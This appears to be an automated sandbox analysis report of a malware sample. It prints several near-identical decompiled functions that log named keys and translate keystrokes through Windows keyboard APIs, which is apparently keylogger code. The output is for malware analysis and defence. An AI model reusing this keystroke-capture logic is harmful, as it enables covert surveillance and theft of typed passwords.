Function 00C8586D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8586D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad /]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8586d
0x00c85874
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Numpad /], xrefs: 00C8586F

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8585C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8585C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad .]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8585c
0x00c85863
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Numpad .], xrefs: 00C8585E

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85AD1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AD1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F12]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85ad1
0x00c85ad8
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F12], xrefs: 00C85AD3
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85A27, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A27(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Zoom]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85a27
0x00c85a2e
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Zoom], xrefs: 00C85A29
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85B59, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B59(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F2]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85b59
0x00c85b60
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F2], xrefs: 00C85B5B
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C859B0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859B0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Process]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
